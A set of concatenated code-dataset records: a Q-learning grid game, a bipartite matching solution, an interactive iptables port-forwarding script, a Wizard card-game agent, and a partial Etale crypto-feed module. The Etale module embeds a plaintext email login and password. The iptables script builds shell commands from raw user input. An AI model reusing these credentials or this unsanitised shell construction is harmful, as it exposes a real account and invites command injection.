[['w','w','w','g'],['g','w','w','G'],['g','w','g','g']]\nkeys_config = [['Ks',(0,0)],['Kn',(1,2)]]\nlocked_config = [[(0,0),'Kn'],[(3,1),'Ks']]\n\n#Agent variables\nagentPos = (2,1)\nagentLPos = None\nagentKeys= []\n\n#Board graphics\n\ndef setupBoard():\n ##missing automatic locked cells \"relief\" choice\n for y in range(len(board_config)):\n for x in range(len(board_config[0])):\n if board_config[y][x] == 'w':\n label = Label(game, width='20', height='3', bg='white', borderwidth=2, relief=\"flat\")\n label.grid(row=y,column=x)\n elif board_config[y][x] == 'g':\n label = Label(game, width='20', height='3', bg='grey', borderwidth=2, relief=\"flat\")\n label.grid(row=y, column=x)\n elif board_config[y][x] == 'G':\n label = Label(game, width='20', height='3', bg='green', borderwidth=2, relief=\"solid\")\n label.grid(row=y, column=x)\n else:\n label = Label(game, width='20', height='3', bg='black', borderwidth=2, relief=\"flat\")\n label.grid(row=y, column=x)\n\n #maybe needs it's own function\n for key in keys_config:\n if key[0] == 'Kn':\n label = Label(game, image=Kn, borderwidth=2, relief=\"flat\")\n label.grid(column=key[1][0],row=key[1][1])\n elif key[0] == 'Ks':\n label = Label(game, image=Ks, borderwidth=2, relief=\"groove\")\n label.grid(column=key[1][0],row=key[1][1])\n else:\n print('no good key')\n\n\ndef initagent():\n label = Label(game, image=agentImg, borderwidth=2, relief=\"flat\")\n label.grid(column=agentPos[0], row=agentPos[1])\n\n\ndef repaint_agent():\n if board_config[agentLPos[1]][agentLPos[0]] == 'w':\n label = Label(game, width='20', height='3', bg='white', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n elif board_config[agentLPos[1]][agentLPos[0]] == 'g':\n label = Label(game, width='20', height='3', bg='grey', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n elif board_config[agentLPos[1]][agentLPos[0]] == 'G':\n label = Label(game, width='20', height='3', bg='green', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n else:\n label = Label(game, width='20', height='3', bg='black', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n\n label = Label(game, image=agentImg, borderwidth=2, relief=\"flat\")\n label.grid(column=agentPos[0], row=agentPos[1])\n\n\n#Movement Functions\n\n\ndef canMove(x, y):\n if y < 0 or y > len(board_config)-1:\n return False\n elif x < 0 or x > len(board_config[0])-1:\n return False\n else:\n if board_config[y][x] == 'g':\n return False\n else:\n for lock in locked_config:\n if lock[0] == (x,y):\n if lock[1] not in agentKeys:\n return False\n else:\n return True\n return True\n\n\ndef moveUp(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0], agentPos[1] - 1):\n agentPos = (agentPos[0],agentPos[1]-1)\n agentMoved()\n\n\ndef moveDown(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0], agentPos[1] + 1):\n agentPos = (agentPos[0],agentPos[1]+1)\n agentMoved()\n\n\ndef moveLeft(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0] - 1, agentPos[1]):\n agentPos = (agentPos[0]-1,agentPos[1])\n agentMoved()\n\n\ndef moveRight(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0] + 1, agentPos[1]):\n agentPos = (agentPos[0]+1,agentPos[1])\n agentMoved()\n\n\ndef agentMoved():\n repaint_agent()\n checkKey()\n\n global AI\n if isGoal() and not AI:\n messagebox.showinfo(\"End Game\", \"The agent reached it's goal\")\n result = messagebox.askokcancel(\"Reset Game ?\",\"Would you like to see Q-Learning AI play?\")\n if result:\n AI = True\n reset(True)\n Q_learning_player()\n else:\n reset(False)\n\n\ndef checkKey():\n for key in keys_config:\n if agentPos == key[1] and key[0] not in agentKeys:\n agentKeys.append(key[0])\n\n if board_config[agentPos[1]][agentPos[0]] == 'G' and 'Ks' not in agentKeys: #1 hack for random reset\n agentKeys.append('Ks')\n\n if 'Ks' in agentKeys and 'Kn' not in agentKeys: #2 hack for random reset\n agentKeys.clear()\n agentKeys.append('Kn')\n agentKeys.append('Ks')\n\n\ndef isGoal():\n if board_config[agentPos[1]][agentPos[0]]== 'G':\n return True\n else:\n return False\n\n\ndef reset(r):\n global agentPos\n agentKeys.clear()\n if r:\n possible_pos = []\n for y in range(len(board_config)):\n for x in range(len(board_config[0])):\n if board_config[y][x] == 'w' or board_config[y][x] == 'G':\n possible_pos.append((x,y))\n agentPos = random.choice(possible_pos)\n checkKey()\n else:\n agentPos = (2,1)\n\n setupBoard()\n initagent()\n\n##Game going\n\nsetupBoard()\ninitagent()\n\n##Q-Learning\nX = ['00KnKs', '10', '10Kn', '10KnKs', '11', '11Kn', '11KnKs', '12Kn', '12KnKs', '20', '20Kn', '20KnKs', '21', '21Kn',\n '21KnKs', '31KnKs']\n\nA = ['U','D','L','R']\n\nQ = np.zeros((16,4))\ncost = np.zeros((16,4))\n\ngamma = 0.9\nalpha = 0.3\ner = 0.1\n\niterations = 0\n\n#auxiliar function choosing action\ndef rando_A(Q,x,er):\n i_x = X.index(x)\n Q_x = Q[i_x, :]\n chooser = rand.random()\n if chooser >= er:\n a = A[rand.choice(np.where(Q_x == np.min(Q_x))[0])]#greedy\n else:\n a = rand.choice(A)\n return a\n\ndef Q_learning_player():\n\n x = str(agentPos[0]) + str(agentPos[1]) + ''.join(key for key in agentKeys)\n\n # choose the action act\n act = rando_A(Q, x, er)\n\n step_chance = rand.random()\n if step_chance <= 0.8: # 20% chance of not moving\n if act == 'U':\n moveUp('')\n elif act == 'D':\n moveDown('')\n elif act == 'L':\n moveLeft('')\n elif act == 'R':\n moveRight('')\n\n # compute the cost ct\n cost[X.index(x), A.index(act)] = 1 if not isGoal() else 0\n\n # Calculate x_t+1\n x_t1 = str(agentPos[0]) + str(agentPos[1]) + ''.join(key for key in agentKeys)\n\n # Q-learning\n Q[X.index(x), A.index(act)] = Q[X.index(x), A.index(act)] + alpha * (\n cost[X.index(x), A.index(act)] + gamma * np.min(Q[X.index(x_t1), :]) - Q[X.index(x), A.index(act)])\n\n global iterations\n iterations += 1\n game.title('Paddi -- Iterations = '+str(iterations))\n if iterations >= 4000: #cannot take over +-4100\n messagebox.showinfo(\"Q-Learning\", \"The agent finished it's job after \" + str(iterations)+\" iterations ... \\n\"+\n \"Q*: \\n\"+\n str(Q))\n game.quit()\n\n # goal reset\n if isGoal():\n game.after(100,reset,True)\n game.after(100, Q_learning_player)\n\n\ngame.bind('', moveUp)\ngame.bind('', moveDown)\ngame.bind('', moveLeft)\ngame.bind('', moveRight)\ngame.mainloop()","sub_path":"paddiGame.py","file_name":"paddiGame.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335905498","text":"import sys\ninput = sys.stdin.readline\n\n\ndef dfs(i):\n for want in cow[i]: #소가 원하는 축사들 중\n if check[want]: #이미 방문(검사)했으면 넘어감\n continue\n check[want] = True\n if house[want] == 0 or dfs(house[want]): #축사가 비어있거나, 축사를 선점한 소가 다른 축사에 갈 수 있을 때\n house[want] = i #축사를 소에게 배정해줌\n return True #축사에 소가 들어갔다고 반환\n return False #들어갈 자리가 없다고 반환\n\n\nn, m = map(int, input().split())\n\ncow = [[] for _ in range(n+1)] #소가 원하는 축사를 저장할 리스트\nhouse = [0 for _ in range(m+1)] #축사에 들어있는 소를 저장할 리스트\nres = 0\n\nfor i in range(1, n+1):\n cow[i].extend(list(map(int, input().split()))[1:]) #소가 원하는 축사 저장\n\nfor i in range(1, n+1):\n check = [False for _ in range(m+1)] #방문 여부 리스트\n if dfs(i):\n res += 1\n\nprint(res)\n","sub_path":"algo_py/boj/bj2188.py","file_name":"bj2188.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224945927","text":"# coding=utf-8\nimport os\nimport commands\nimport socket\n\n# 检查当前系统\ndef check_sys():\n global sys\n value = commands.getstatusoutput('cat /etc/redhat-release | grep -q -E -i \"centos\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n value = commands.getstatusoutput('cat / etc / issue | grep - q - E - i \"debian\"')\n if value[0] == 0:\n sys = 'debian'\n else:\n value = commands.getstatusoutput('cat /etc/issue | grep -q -E -i \"ubuntu\"')\n if value[0] == 0:\n sys = 'ubuntu'\n else:\n value = commands.getstatusoutput('cat /etc/issue | grep -q -E -i \"centos|red hat|redhat\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n value = commands.getstatusoutput('cat /proc/version | grep -q -E -i \"debian\"')\n if value[0] == 0:\n sys = 'debian'\n else:\n value = commands.getstatusoutput('cat /proc/version | grep -q -E -i \"ubuntu\"')\n if value[0] == 0:\n sys = 'ubuntu'\n else:\n value == commands.getstatusoutput('cat /proc/version | grep -q -E -i \"centos|red hat|redhat\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n print('此脚本不支持你的系统!')\n os._exit(0)\n\n# 重新运行程序\ndef restart_program():\n os.system('python iptables_forward.py')\n\n# 安装iptables\ndef install_iptables():\n status = commands.getstatusoutput('iptables -V')\n if status[1] != '':\n print('已安装iptables')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('iptables未安装,开始安装~~~')\n if sys == 'centos':\n os.system('yum update&&yum install -y iptables')\n else:\n os.system('apt-get update&&apt-get install -y iptables')\n status = commands.getstatusoutput('iptables -V')\n if status[1] != '':\n print('已完成安装iptables')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('iptables未安装,请检查可能是系统不支持')\n raw_input('按任意键继续')\n os._exit(0)\n\n# 获得ip\ndef get_host_ip():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n ip = s.getsockname()[0]\n finally:\n s.close()\n return ip\n\n# 添加iptables端口转发\ndef add_forward():\n\n forward_ip = raw_input('输入本地ip(回车自动获取):') or get_host_ip()\n print(forward_ip)\n\n forward_port = raw_input('输入本地端口(默认10000):') or '10000'\n print(forward_port)\n\n forwarded_ip = raw_input('输入被转发ip:')\n print(forwarded_ip)\n\n forwarded_port = raw_input('输入被转发端口(默认' + forward_port + '):') or forward_port\n print(forwarded_port)\n\n forward_type = raw_input('请输入数字 来选择 iptables 转发类型(默认TCP+UDP):\\n1.TCP\\n2.UDP\\n3.TCP+UDP\\n') or '3'\n\n while forward_type == '1' or '2' or '3':\n if forward_type == '1':\n os.system(\n 'iptables -t nat -A PREROUTING -p tcp -m tcp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p tcp -m tcp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n elif forward_type == '2':\n os.system(\n 'iptables -t nat -A PREROUTING -p udp -m udp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p udp -m udp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n elif forward_type == '3':\n os.system(\n 'iptables -t nat -A PREROUTING -p tcp -m tcp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A PREROUTING -p udp -m udp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p tcp -m tcp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p udp -m udp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n else:\n forward_type = raw_input('输入错误!!!\\n请再次输入数字 来选择 iptables 转发类型(默认TCP+UDP):\\n1.TCP\\n2.UDP\\n3.TCP+UDP\\n') or '3'\n choice = raw_input('是否需要继续添加y/n(默认y):') or 'y'\n if choice == 'y':\n add_forward()\n # 开启防火墙的ipv4转发\n os.system('echo -e \"net.ipv4.ip_forward=1\" >> /etc/sysctl.conf&&sysctl -p')\n # 配置iptables开机加载\n if sys == 'centos':\n os.system('service iptables save&&chkconfig --level 2345 iptables on')\n else:\n os.system(\n 'iptables-save > /etc/iptables.up.rules&&echo -e ''#''!/bin/bash\\\\n/sbin/iptables-restore < /etc/iptables.up.rules'' > /etc/network/if-pre-up.d/iptables&&chmod +x /etc/network/if-pre-up.d/iptables')\n else:\n restart_program()\n\n# 清空iptables端口转发\ndef del_all_forwarding():\n num = commands.getstatusoutput('iptables -t nat -vnL POSTROUTING')\n all_num = num[1].count('*')/2\n a = 0\n while a < all_num:\n os.system('iptables -t nat -D POSTROUTING 1&&iptables -t nat -D PREROUTING 1')\n a = a+1\n if a == all_num:\n print('所有规则已清除')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('清除未成功')\n raw_input('按任意键继续')\n restart_program()\n\n# 查看iptables端口转发\ndef view_forwarding():\n show = commands.getoutput('iptables -t nat -vnL POSTROUTING')\n print(show+'\\n以上是你现有的规则')\n raw_input('按任意键回到主菜单')\n restart_program()\n#删除iptables端口转发\ndef del_forwarding():\n show = commands.getoutput('iptables -t nat -vnL POSTROUTING')\n print(show + '\\n以上是你现有的规则')\n raw_input('按任意键继续')\n if show == 'Chain POSTROUTING (policy ACCEPT 460 packets, 28030 bytes)\\npkts bytes target prot opt in out source destination':\n raw_input('你没有任何端口转发,按任意键回主菜单')\n restart_program()\n else:\n no = raw_input('你想删除的规则序号(如1,2,3,4):')\n output = commands.getoutput('iptables -t nat -D POSTROUTING '+no+'&&iptables -t nat -D PREROUTING '+no)\n if output == 'iptables: Bad rule (does a matching rule exist in that chain?).':\n raw_input('你还没有添加规则或是没有输入序号,按任意键回到主菜单')\n restart_program()\n else:\n print('规则已删除')\n choice = raw_input('是否继续删除y/n(默认y):') or 'y'\n if choice == 'y':\n del_forwarding()\n else:\n print('回到主菜单')\n restart_program()\n\ncheck_sys()\n\nprint('你当前的系统为'+sys)\n\nselect = raw_input('iptables端口转发一键管理脚本\\n'\n '--------------------\\n'\n '1.安装iptables\\n'\n '2.清空iptables端口转发\\n'\n '--------------------\\n'\n '3.添加iptables端口转发\\n'\n '4.查看iptables端口转发\\n'\n '5.删除iptables端口转发\\n'\n '--------------------\\n'\n '6.退出当前脚本\\n'\n '注意:初次使用前请请务必执行 1.安装iptables(不仅仅是安装)\\n\\n'\n '请输入数字 [1-6]:')\nif select == '1':\n install_iptables()\nelif select == '2':\n del_all_forwarding()\nelif select == '3':\n add_forward()\nelif select == '4':\n view_forwarding()\nelif select == '5':\n del_forwarding()\nelif select == '6':\n os._exit(0)\nelse:\n raw_input('输入出错,请重新输入,按任意键继续')\n restart_program()","sub_path":"iptables_forward.py","file_name":"iptables_forward.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522732639","text":"import os\nimport random\nimport collections\nimport numpy as np\n\nfrom game_engine import player\nfrom agents.predictors import NNPredictor\n\nMODELS_PATH = 'models/'\n\n\nclass RuleBasedAgent(player.Player):\n \"\"\"A computer player that makes decision on predefined rules.\n Aims to resemble the performance and behaviour of that of a human.\n Agent functions by calculating the win desirability of the trick and the\n win probability given the cards. It then makes a decision of what card based\n on the probabilities.\n\n Attributes:\n name (str): name of agent\n aggresion (float): see comment below\n use_predictor (bool): if True uses neural net as predictor, else use rule base predictor\n keep_models_fixed (bool): if True, NN is not trained if agent uses it for predictions\n\n \"\"\"\n\n # Use this to print out a trick by trick breakdown of the state of the trick and\n # the action and inferences of the rule-based agent\n DEBUG = False\n\n def __init__(self, name=None, aggression=0.0, use_predictor=False, keep_models_fixed=False):\n super().__init__()\n self.round = 1\n self.num_players = 4\n self.error = 0\n if name is not None:\n self.name = name\n elif use_predictor:\n self.name = self.__class__.__name__ + 'Predictor'\n else:\n self.name = self.__class__.__name__\n\n # aggression is a measure of how high the agent naturally tries to predict. High aggression is good\n # with weak opponents and low aggression for quality opponents. Takes values between -1 and 1.\n self.aggression = RuleBasedAgent.bound(aggression, 1, -1)\n\n self.use_predictor = use_predictor\n self.keep_models_fixed = keep_models_fixed\n\n if self.use_predictor:\n self.predictor_model_path = os.path.join(MODELS_PATH, self.name, 'Predictor/')\n self.predictor = NNPredictor(model_path=self.predictor_model_path, keep_models_fixed=self.keep_models_fixed)\n\n def save_models(self):\n if self.keep_models_fixed:\n return\n if not os.path.exists(self.predictor_model_path):\n os.makedirs(self.predictor_model_path)\n self.predictor.save_model()\n\n def get_prediction(self, trump, num_players):\n \"\"\"This algorithm predicts the amount of tricks that the player should win. It does this assigning\n an expected return for each card and sums all the expected returns together. It also takes into\n consideration the aggression of the agent.\n\n Args:\n trump (Card): trump card\n num_players (int): amount of players\n\n Returns:\n int: prediction\n \"\"\"\n\n if self.use_predictor:\n # Neural Network Prediction\n self.prediction_x, prediction = self.predictor.make_prediction(self.hand, trump)\n return prediction\n else:\n # rule based prediction\n self.num_players = num_players\n self.played = []\n self.error += (self.prediction - self.wins)\n prediction = 0\n for card in self.hand:\n if card.value == 14:\n prediction += 0.95 + (0.05 * self.aggression)\n elif card.color == trump.color:\n prediction += (card.value * (0.050 + (0.005 * self.aggression))) + 0.3\n else:\n prediction += (card.value * (0.030 + (0.005 * self.aggression)))\n prediction = round(RuleBasedAgent.bound(prediction, len(self.hand), 0), 0)\n self.prediction = prediction\n return prediction\n\n def announce_result(self, num_tricks_achieved, reward):\n \"\"\"\n Occurs after each round, evaluating the score of the player and resetting round-based variables\n :param num_tricks_achieved:\n :param reward:\n :return:\n \"\"\"\n\n if self.use_predictor:\n super().announce_result(num_tricks_achieved, reward)\n self.predictor.add_game_result(self.prediction_x, num_tricks_achieved)\n\n else:\n self.wins = num_tricks_achieved\n self.reward = reward\n self.score += reward\n self.hand = []\n\n if 60 / self.num_players == self.round:\n self.round = 1\n else:\n self.round += 1\n\n def play_card(self, trump, first, played, players, played_in_game, first_player_index):\n \"\"\"\n Finds the card whose win probability most closely matches that of the win desirability\n :param trump:\n :param first:\n :param played:\n :param players:\n :param played_in_game:\n :param first_player_index\n :return: best_card\n \"\"\"\n played = list(filter(lambda card: not card is None, played.values()))\n played_in_game = sum(played_in_game.values(), [])\n\n win_desirability = self.win_desirability(players)\n best_card = self.get_playable_cards(first)[0]\n best_delta = abs(win_desirability - self.win_probability(played, best_card, trump, first, players,\n played_in_game))\n best_win_likelihood = 0\n round_winning_cards = []\n # calculates the win probability for every playable card\n for card in self.get_playable_cards(first):\n if card != best_card:\n win_likelihood = self.win_probability(played, card, trump, first, players, played_in_game)\n if win_likelihood == 1: round_winning_cards.append(card)\n delta = abs(win_desirability - win_likelihood)\n # tries to find a card that minimizes the delta between the win desirability and the win probability\n if delta < best_delta:\n best_card = card\n best_delta = delta\n if win_likelihood > best_win_likelihood: best_win_likelihood = win_likelihood\n # If going to lose anyway then play the worst card (the one with the greatest number of stronger cards)\n played_cards = played_in_game\n if best_win_likelihood == 0:\n if win_desirability > 0:\n counter = 0\n for card in self.get_playable_cards(first):\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards > counter:\n best_card = card\n counter = number_of_stronger_cards\n else: # we want to get rid of our most valuable card\n counter = 60\n for card in self.get_playable_cards(first):\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards < counter:\n best_card = card\n counter = number_of_stronger_cards\n elif len(round_winning_cards) > 1: # Play the weakest possible winning hand\n counter = 0\n for card in round_winning_cards:\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards > counter:\n best_card = card\n counter = number_of_stronger_cards\n # debug output after each trick\n if self.DEBUG:\n print(\"\\033[1;32;40mRound: \" + str(self.round) + \" | Trick: \" + str(self.round - len(self.hand) + 1))\n print(\"\\033[1;37;40mPlayed: \" + str(played) + \" | Total Cards Played: \" + str(len(played_in_game)))\n print(\"Prediction: \" + str(self.prediction) + \" | Wins: \" + str(self.wins))\n print(\"Hand: \" + str(self.hand) + \" | Trump: \" + str(trump))\n print(\"Win Probability: \" + str(self.win_probability(played, best_card, trump, first, players,\n played_in_game)) + \" | Win Desirability: \" + str(\n win_desirability))\n print(\"Chosen Card: \" + str(best_card) + \" | \" + str(\n self.number_of_stronger_cards_remaining(best_card, trump, first, played_in_game)))\n self.hand.remove(best_card)\n return best_card\n\n def get_trump_color(self):\n \"\"\"\n Determines trump color by choosing the color the agent has the most of in its hand\n Returns:\n str: color of trump\n \"\"\"\n color_counter = collections.Counter()\n for card in self.hand:\n color = card.color\n if color == \"White\":\n continue\n color_counter[color] += 1\n if not color_counter.most_common(1):\n return self.hand[random.randint(0, len(self.hand) - 1)].color\n else:\n return color_counter.most_common(1)[0][0]\n\n def win_probability(self, played, card, trump, first, players, played_in_game):\n \"\"\"\n Given a card and the current state, this algorithm calculates the probability of winning by seeing if the card is\n stronger than those already played and estimates the chance that a stronger card will be played in the future.\n :param played:\n :param card:\n :param trump:\n :param first:\n :param players:\n :return: probability of winning\n \"\"\"\n if first is None: # The probability I win is based only on the possibility that another agent has a\n # stronger card and plays it\n probability = ((61 - len(played_in_game) - len(self.hand)) -\n self.number_of_stronger_cards_remaining(card, trump, first, played_in_game)) \\\n / (61 - len(played_in_game) - len(self.hand))\n return probability\n else:\n for other_card in played:\n if self.round == (60 / len(players)): trump = first\n # if there is a played card stronger than this card then the probability is instantly 0\n if self.strongest_card(other_card, card, trump, first) == True:\n return 0\n if len(played) == len(players) - 1:\n # However if there is no stronger card and the agent is the last to play then the probability is 1\n return 1\n else:\n # if not then calculate the probability as before (based on how many stronger cards remain\n probability = ((61 - len(played_in_game) - len(self.hand)) - self.number_of_stronger_cards_remaining(\n card, trump, first, played_in_game)) \\\n / (61 - len(played_in_game) - len(self.hand))\n return probability\n\n def win_desirability(self, players):\n \"\"\"\n Approximates the desire to win based on how many rounds are left to play and how many predictions are left to make\n and also dependent on how many tricks left for the opposition to make\n :param players:\n :return: win desirability\n \"\"\"\n if (self.prediction - self.wins) >= len(self.hand):\n return 1\n elif self.prediction <= self.wins:\n return 0\n else:\n desirability = 1.3 * (self.prediction - self.wins) / len(self.hand)\n for player in players:\n if player != self:\n desirability += (1 / (len(players) + 1)) * (player.prediction - player.wins) / len(self.hand)\n desirability += 0.1 * np.cos((self.round - len(self.hand)) * (np.pi / self.round))\n return RuleBasedAgent.bound(desirability, 1, 0)\n\n @staticmethod\n def bound(value, max, min):\n \"\"\"\n Bounds the value between a given range.\n :param value:\n :param max:\n :param min:\n :return: a value between the maximum and minimum\n \"\"\"\n if value > max:\n return max\n elif value < min:\n return min\n else:\n return value\n\n def cards_left_by_color(self, color, target_card, played_in_game):\n \"\"\"\n Keeps track of all cards played in that round and deduces how many cards of that color are left\n :param color:\n :param card: removes this card from the counting procedure\n :return: number_of_cards_of_that_color_left\n \"\"\"\n all_cards_left = []\n for card in played_in_game:\n all_cards_left.append(card)\n for card in self.hand:\n all_cards_left.append(card)\n all_cards_left.remove(target_card)\n cards_by_color_left = []\n for card in all_cards_left:\n if card.color == color:\n cards_by_color_left.append(card)\n return cards_by_color_left\n\n def number_of_stronger_cards_remaining(self, card, trump, first, played_in_game):\n \"\"\"\n Estimates the number of stronger cards remaining in the deck\n :param card:\n :param trump:\n :param first:\n :param played_in_game:\n :return: number of stronger cards\n \"\"\"\n if card.value == 14: return 0\n if card.value == 0: return 61 - len(played_in_game) - len(self.hand)\n played_wizard_counter = 0\n played_trump_higher_counter = 0\n played_trump_lower_counter = 0\n played_second_trump_higher_counter = 0\n played_second_trump_lower_counter = 0\n played_remainder_counter = 0\n for played_card in played_in_game:\n if played_card.value == 14: played_wizard_counter += 1\n for played_card in self.cards_left_by_color(trump.color, card, played_in_game):\n if played_card.value > card.value:\n played_trump_higher_counter += 1\n else:\n played_trump_lower_counter += 1\n if first is None:\n color = card.color\n else:\n color = first.color\n for played_card in self.cards_left_by_color(color, card, played_in_game):\n if played_card.value > card.value:\n played_second_trump_higher_counter += 1\n else:\n played_second_trump_lower_counter += 1\n for other_color in [\"Red\", \"Green\", \"Yellow\", \"Blue\"]:\n if other_color != trump and other_color != color:\n for played_card in self.cards_left_by_color(other_color, card, played_in_game):\n if played_card.value > card.value: played_remainder_counter += 1\n\n # If it is the last round then ignore trumps\n if self.round == (60 / self.num_players):\n stronger_cards = (13 - played_second_trump_higher_counter - card.value) + (4 - played_wizard_counter)\n # The amount of stronger cards is dependent on the amount of higher cards minus those already played\n elif card.color == trump.color: # for trump colored card\n stronger_cards = (13 - played_trump_higher_counter - card.value) + (4 - played_wizard_counter)\n elif first is not None and card.color == first.color: # for a card that has the same colour as the first\n stronger_cards = (13 - played_second_trump_higher_counter - card.value) + \\\n (12 - played_trump_higher_counter - played_trump_lower_counter) + (\n 4 - played_wizard_counter)\n else: # if the color of the card is none of them\n stronger_cards = (12 - played_trump_higher_counter - played_trump_lower_counter) + \\\n (12 - played_second_trump_higher_counter - played_second_trump_lower_counter) + \\\n (24 - played_remainder_counter - card.value * 2) + (4 - played_wizard_counter)\n # checks to see that the amount of stronger cards is not greater than the amount of cards already left\n if stronger_cards > (61 - len(played_in_game) - len(self.hand)):\n return (61 - len(played_in_game) - len(self.hand))\n else:\n return stronger_cards\n\n def strongest_card(self, new_card, old_card, trump, first_card):\n \"\"\"Determines whether the new played card wins the trick\n\n :param new_card: card that contests with current winning card\n :param old_card: card currently winning the trick\n :param trump:\n :param first_card: first card played. Determines the suit of the trick. May be None\n :return: bool: True if the new_card wins, taking into account trump colors, first_card color and order.\n \"\"\"\n\n # If a Z was played first, it wins.\n if old_card.value == 14:\n return False\n # If not and the new card is a Z, the new card wins.\n if new_card.value == 14:\n return True\n # First N wins, so if the second card is N, it always wins.\n if new_card.value == 0:\n return False\n # Second N wins only if new_card is NOT N.\n elif old_card.value == 0:\n return True\n # If they are both colored cards, the trump color wins.\n if old_card.color == trump.color:\n if new_card.color != trump.color:\n return False\n else: # If both are trump color, the higher value wins.\n return old_card.value < new_card.value\n else:\n # old_card is not trump color, then if new_card is, new_card wins\n if new_card.color == trump.color:\n return True\n else:\n # Neither are trump color, so check for first color.\n if old_card.color == first_card.color:\n if new_card.color != first_card.color:\n # old card is first_card color but new card is not, old wins.\n return False\n else:\n # Both are first_card color, bigger value wins.\n return old_card.value < new_card.value\n","sub_path":"agents/rule_based_agent.py","file_name":"rule_based_agent.py","file_ext":"py","file_size_in_byte":17991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637167897","text":"import asyncio\nimport json\nimport logging\n\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom pytz import UTC\nfrom time import sleep, time\n\nfrom sortedcontainers import SortedDict as sd\n\nfrom cryptofeed.feed import Feed\nfrom cryptofeed.defines import ETALE, L2_BOOK, TRADES, CANDLES, BUY, SELL, BID, ASK, FEE\nfrom cryptofeed.standards import pair_exchange_to_std\n\nwss_url = 'wss://api-uat.etale.com/api'\nauth = json.dumps({'type':'LOGIN','username':'orens77@gmail.com','password':'i5P5lSyq0K'})\n\nLOG = logging.getLogger('feedhandler')\n\ndef etale_pair_exchanges(auth):\n ''' \n not the best way to get pairs\n we have to send auth to just get the api to respond so when it does respond \n it automatically sends all your balances which we have to ignore\n '''\n import json\n from websocket import create_connection\n wss_url = 'wss://api-uat.etale.com/api'\n ws = create_connection(wss_url)\n ws.send(auth)\n ws.send(json.dumps({\"type\":\"MARKET_DATA_CONFIG_REQUEST\"}))\n while ws.connected:\n message = ws.recv()\n msg = json.loads(message)\n msg_type = msg['type']\n if msg_type == 'MARKET_DATA_CONFIG':\n ws.close()\n return {info['pair'] : sorted(info['exchanges']) for info in msg['pairs']}\n raise RuntimeError(\"could not get marget data config from api-uat.etale.com\")\n\n\nclass Etale(Feed):\n id = ETALE\n _pair_exchanges = None\n\n @staticmethod\n def pair_exchanges():\n _pair_exchanges = Etale._pair_exchanges\n if _pair_exchanges is None:\n _pair_exchanges = Etale._pair_exchanges = etale_pair_exchanges(auth)\n return _pair_exchanges\n\n\n def __init__(self, pairs=None, channels=None, callbacks=None, filter=None, track_balances=False, separate_feeds=False, **kwargs):\n '''\n filter = dictionary of iterables\n {\n pair : [exchanges],\n exch : [pairs],\n ... }\n track_balances = True or False [default] to track balances on this feed.\n '''\n super().__init__(wss_url, pairs=pairs, channels=channels, callbacks=callbacks, **kwargs)\n self._ws = None\n if filter is None:\n filter = { pair:['Bitfinex'] for pair, exchs in self._pair_exchanges.items()\n if pair.split('-')[1] in ('CAD', 'GBP', 'EUR', 'JPY', 'KRW', 'USD') }\n self._filter = filter\n self._separate_feeds = separate_feeds\n self._track_balances = track_balances\n if pairs is not None:\n for chan in self.channels:\n self.config[chan] = self.pairs\n self._reset()\n\n def _reset(self):\n if self._ws is not None:\n if self._ws.open:\n self._ws.close()\n self.l2_book = {}\n self.balances = {}\n self.subscriptions = {}\n self.candlesticks = []\n self.consolidateds = []\n self.events = {}\n\n def _filtered_exchanges(self, pair):\n exchanges = self._pair_exchanges[pair]\n if self._filter:\n if pair in self._filter:\n return [exch for exch in exchanges if exch not in self._filter[pair]]\n return [exch for exch in exchanges if pair not in self._filter.get(exch, [])]\n\n async def subscribe(self, ws):\n self._reset()\n self._ws = ws\n await ws.send(auth)\n for pair in set(self.config.get(TRADES, []) + self.config.get(L2_BOOK, 